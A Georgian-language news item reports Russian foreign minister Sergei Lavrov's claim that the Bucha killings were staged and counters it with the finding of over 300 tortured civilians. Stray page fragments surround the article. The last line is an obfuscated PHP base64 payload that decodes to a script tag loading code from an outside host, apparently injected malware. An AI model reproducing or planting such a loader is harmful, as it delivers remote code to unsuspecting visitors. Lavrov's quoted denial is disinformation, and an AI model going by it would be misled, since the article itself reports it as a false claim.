celsiusi
ავერსი საქკაბელი
რუსეთის საგარეო საქმეთა მინისტრი, სერგეი ლავროვი ირწმუნება, რომ უკრაინის ქალაქ ბუჩას მოვლენები ინსცენირებულია. 
 
მისივე თქმით, რუსმა სამხედრო მოსამსახურეებმა მიღწეული გეგმებისა და შეთანხმებების შესაბამისად, ტერიტორია დატოვეს. რამდენიმე დღის შემდეგ კი უკრაინელებმა სპექტაკლი დადგეს.
 
"ქალაქ ბუჩაში მორიგი ყალბი თავდასხმა განხორციელდა მას შემდეგ, რაც რუსმა სამხედრო მოსამსახურეებმა მიღწეული გეგმებისა და შეთანხმებების შესაბამისად ტერიტორია დატოვეს. რამდენიმე დღის შემდეგ სპექტაკლი დადგეს, რომელსაც ყველა არხით და სოციალური ქსელით ავრცელებენ უკრაინის წარმომადგენლები და მათი დასავლელი მფარველები. 31 მარტს რუსული ჯარის სრულად გამოვიდა. ამავე დროს, 31 მარტს ბუჩას მერმა საზეიმოდ განაცხადა, რომ მასთან ყველაფერი კარგად იყო და ორი დღის შემდეგ ვნახეთ, როგორ მოეწყო ქუჩაში ის, რასაც ახლა ცდილობენ გამოიყენონ ანტირუსული მიზნებისთვის. რამდენიმე კვირის წინ იყო მცდელობა მარიუპოლის ერთ-ერთ სამშობიაროში შექმნილი ვითარება რუსი სამხედროების დანაშაულად ეჩვენებინათ. როგორც მოგვიანებით გაირკვა, მცდელობა განხორციელდა ღიად პროვოკაციული მიზნით და მოხდა ყალბი მასალების მხილება,"- აცხადებს ლავროვი. 
 
შეგახსენებთ, რომ ბუჩაში რუსეთის საოკუპაციო ძალების მიერ მოკლული მოქალაქეები დაკრძალეს. ქალაქის წმენდაზე შესულ სამხედროებს საშინლად ნაწამები და დასახიჩრებული 300–ზე მეტი მშვიდობიანი მოქალაქე დახდათ. 
1107
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");